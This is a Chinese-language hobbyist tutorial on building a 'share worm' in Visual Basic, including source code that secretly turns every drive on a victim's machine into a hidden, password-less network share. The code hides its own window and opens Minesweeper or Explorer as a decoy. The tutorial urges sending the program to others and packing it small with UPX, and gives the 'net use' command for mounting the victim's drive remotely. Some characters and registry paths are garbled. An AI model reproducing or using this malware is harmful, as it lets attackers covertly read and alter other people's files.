作者:香水百合   
    
     
     VB是一個(gè)非常"美好"的編程語(yǔ)言，至少我是這么認(rèn)為的。原因有二：其一是，VB的英文名可以解釋為Very Beautiful,這是VB的"美";其二是，"好"字的五筆輸入碼是什么？"VB"是也，這就是我所謂的VB的"好"。嘻嘻，這樣的解釋夠Cool吧！
     但事物都是有兩面性的,這么美的語(yǔ)言在有些人手里卻成了搞"破壞"的工具,被用來(lái)編寫(xiě)病毒.最近網(wǎng)絡(luò)上的各種病毒層出不窮，其中有相當(dāng)一部分就是VB的杰作.比較有代表性的是共享蠕蟲(chóng)病毒.今天我們就來(lái)讓它現(xiàn)出原形!
     所謂的共享蠕蟲(chóng)的病毒(network.vbs)，它體積不但小巧(只有1K)， 而且很具有破壞性！只要被這個(gè)病毒感染了的機(jī)器，所有的硬盤(pán)就會(huì)被完全共享，并且可以在局域網(wǎng)和因特網(wǎng)中傳播。下面我們先談?wù)勊�的原理�?br>     我們知道，把一個(gè)目錄設(shè)置為共享的時(shí)候，如果在共享名后面加上$ 符號(hào)，那么這個(gè)目錄將變成一個(gè)隱含的共享目錄，即對(duì)方的機(jī)器上看不見(jiàn)這個(gè)共享目錄。但是如果對(duì)方知道共享目錄名，仍然是可以訪問(wèn)的，只要在這個(gè)目錄后面加上$ 符號(hào)就可以了。
     雖然對(duì)方看不見(jiàn)這個(gè)共享目錄，但是自己是可以看見(jiàn)的。這樣也是不行的，雖然我們已經(jīng)加上$ 符號(hào)，但是我們?nèi)匀豢梢园l(fā)現(xiàn)這個(gè)共享目錄的圖標(biāo)下面已經(jīng)加上了一個(gè)小手，表示這個(gè)目錄已經(jīng)被設(shè)置為共享。這樣使用者就會(huì)知道機(jī)器被人改動(dòng)過(guò)了。而共享蠕蟲(chóng)的高明之處就在于：不光是對(duì)方看不見(jiàn)這個(gè)共享目錄，而且連自己也是看不見(jiàn)這個(gè)共享目錄的，這樣就可以做到神不知，鬼不覺(jué)了。當(dāng)你把這個(gè)程序發(fā)過(guò)對(duì)方，對(duì)方執(zhí)行完以后，對(duì)方的機(jī)器就會(huì)被全部被共享，而對(duì)方卻不知道。
     做到對(duì)方看不見(jiàn)很容易，只要在共享目錄名后面加上$ 符就可以了；而共享蠕蟲(chóng)程序是怎么做到連自己也看不出來(lái)的呢？其實(shí)道理說(shuō)出來(lái)也是很簡(jiǎn)單的，秘密就在注冊(cè)表中。請(qǐng)看下面的例子：
     1.運(yùn)行Regedit命令，打開(kāi)注冊(cè)表；
     2.找到下面的子鍵
     HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionNetworkLanManC$
     3.在屏幕的右邊，你可以看見(jiàn)下面的內(nèi)容；
     Flags 0x00000302(770)
     Parm1enc (長(zhǎng)度為零的二進(jìn)制值)
     Parm2enc (長(zhǎng)度為零的二進(jìn)制值)
     Path "C:"
     Remark "Remark By Scent Lily"
     Type 0x00000000(0)
     關(guān)鍵的地方就是Flag這個(gè)參數(shù)，它的鍵值決定了共享目錄的類(lèi)型。我們把Flags的值設(shè)為302(16進(jìn)制)就可以了。
     知道原理以后，用VB編制共享蠕蟲(chóng)的方法就很簡(jiǎn)單了，大致的步驟如下：
     1.用GetDriveType函數(shù)檢測(cè)機(jī)器從C盤(pán)開(kāi)始的所有驅(qū)動(dòng)器。軟驅(qū)我想就不必共享了，沒(méi)有什么實(shí)際意義的！
     2.將找到的每一個(gè)驅(qū)動(dòng)器后面加上$ 符作為一個(gè)子鍵(C$,D$,E$)，寫(xiě)入注冊(cè)表的LanMan子鍵下；
     3.將每一個(gè)子鍵的"Flags"值設(shè)置為302(16進(jìn)制)；
     4.將"Path"設(shè)置成相應(yīng)的路徑；如果愿意，你可以對(duì)"Remark"進(jìn)行設(shè)置，比如，"某某到此一游了！"，這樣就OK了;
     4.如果你還想讓程序更隱蔽一點(diǎn)，你可以在程序運(yùn)行的時(shí)候，先執(zhí)行一個(gè)程序，比如掃雷、空當(dāng)接龍，或者找開(kāi)記事本、資源管理器等等。這樣，對(duì)方就更不容易識(shí)破了！
     下面講一下程序的關(guān)鍵部分
     Option Explicit
     Dim WinDir As String
     Const CommonPath = "SoftWareMicrosoftWindowsCurrentVersionNetworkLanMan"
     
     Private Sub Form_Load()
     Me.Hide
     Dim buff As String, DriveNo As Integer, Result As Integer, Game
     For DriveNo = 0 To 25 注釋?zhuān)罕闅v所有的26個(gè)驅(qū)動(dòng)器
     buff = Chr$(65 + DriveNo) + ":" 注釋?zhuān)喝◎?qū)動(dòng)器符
     Result = GetDriveType(buff) 注釋?zhuān)赫{(diào)用API函數(shù)來(lái)獲得驅(qū)動(dòng)器的類(lèi)型
     If Result = 3 Xor Result = 5 Then
     setvalue HKEY_LOCAL_MACHINE, CommonPath + Chr(65 + DriveNo) + "$", "Flags", REG_DWORD, "770", 3 注釋?zhuān)簩?xiě)入共享的類(lèi)型，這就是程序的關(guān)鍵所在
     setvalue HKEY_LOCAL_MACHINE, CommonPath + Chr(65 + DriveNo) + "$", "Type", REG_DWORD, "0", 0
     setvalue HKEY_LOCAL_MACHINE, CommonPath + Chr(65 + DriveNo) + "$", "Path", REG_SZ, buff, 4 注釋?zhuān)簩?xiě)入共享驅(qū)動(dòng)器的路徑，就是"C:","D:"等等
     setvalue HKEY_LOCAL_MACHINE, CommonPath + Chr(65 + DriveNo) + "$", "Parm2enc", REG_BINARY, 0, 0 注釋?zhuān)簩?xiě)入共享目錄的只讀訪問(wèn)密碼；
     setvalue HKEY_LOCAL_MACHINE, CommonPath + Chr(65 + DriveNo) + "$", "Parm1enc", REG_BINARY, 0, 0 注釋?zhuān)簩?xiě)入該共享目錄的完全訪問(wèn)密碼；；
     setvalue HKEY_LOCAL_MACHINE, CommonPath + Chr(65 + DriveNo) + "$", "Remark", REG_SZ, "Remark by scent lily!", 21 注釋?zhuān)簩?xiě)入一些注釋信息，比如“香水百合到此一游”
     End If
     Next DriveNo
     GetWinDir 注釋?zhuān)韩@得windows目錄的路徑
     If Dir(WinDir & "winmine.exe") <> "" Then 注釋?zhuān)喝绻�有掃雷游戲的話就在前臺(tái)執(zhí)行它
     Game = Shell(WinDir & "WINMINE.EXE", vbMaximizedFocus)
     Else
     注釋?zhuān)阂驗(yàn)閽呃子螒虿皇潜匮b的，可能有的機(jī)器沒(méi)有安裝，但是資源管理器是肯定有的。所以，如果沒(méi)有掃雷游戲 就啟動(dòng)一個(gè)資源管理器
     Game = Shell(WinDir & "explorer", vbMaximizedFocus)
     End If
     Unload Me
     End Sub
     
     Public Sub GetWinDir() 注釋?zhuān)韩@得windows所在目錄的子程序
     Dim Length As Long
     WinDir = String(MAX_PATH, 0)
     Length = GetWindowsDirectory(WinDir, MAX_PATH)
     WinDir = Left(WinDir, InStr(WinDir, Chr(0)) - 1)
     End Sub
     完整的程序大家可以去網(wǎng)上下載(香水百合園http://scentlily.y365.com)，其中的可執(zhí)行文件是用VB6.0編譯的，建議再用VB5.0重新編譯一下。這樣你只需要將這一個(gè)可執(zhí)行文件分發(fā)給別人就OK了，不需要其它的任何DLL文件，因?yàn)閃in98和Win2000已經(jīng)自帶VB5.0的DLL文件啦。這樣就做成了一個(gè)綠色軟件。你再用UPX這個(gè)可執(zhí)行文件壓縮工具壓縮一下，就只有6K了，感覺(jué)很爽吧！
     有很多朋友來(lái)信問(wèn)我，即然對(duì)方和自己都看不見(jiàn)這個(gè)共享目錄，那到底怎么使用呢？其實(shí)方法也很簡(jiǎn)單的，因?yàn)樵诰W(wǎng)上鄰居里是看不見(jiàn)的，所以我們需要到DOS方式下去使用。命令如下：
     語(yǔ)法：net use <映射的盤(pán)符> \對(duì)方的IPC$
     例如：net use x: \192.168.0.2D$
     執(zhí)行完這個(gè)命令以后，就將對(duì)方(192.168.0.2)的D盤(pán)映射成自己的X盤(pán)了。你就可以象使用C盤(pán)D盤(pán)那樣使用X盤(pán)了，當(dāng)你切換到X盤(pán)后，對(duì)X盤(pán)所進(jìn)行的操作，實(shí)際上就是對(duì)方的D盤(pán)進(jìn)行操作。
     因?yàn)楝F(xiàn)在的網(wǎng)友都已經(jīng)很少愿意接收可執(zhí)行文件了，所以網(wǎng)上流行的共享蠕蟲(chóng)程序是VBS格式的腳步語(yǔ)言。不過(guò)原理是一樣的，只是實(shí)現(xiàn)的方法不一樣罷了！
     怎么樣！在別人機(jī)器上跳舞的感覺(jué)如何？一句話，"一切盡在掌握！"，知道香水百合為什么用愛(ài)立信手機(jī)了吧！:)不過(guò)，還是要提醒你一句，看看就可以了，開(kāi)開(kāi)玩笑也沒(méi)問(wèn)題,不過(guò)千萬(wàn)不要搞破壞！因?yàn)閂B是最"美好"的語(yǔ)言,不要破壞了她的美好形象噢！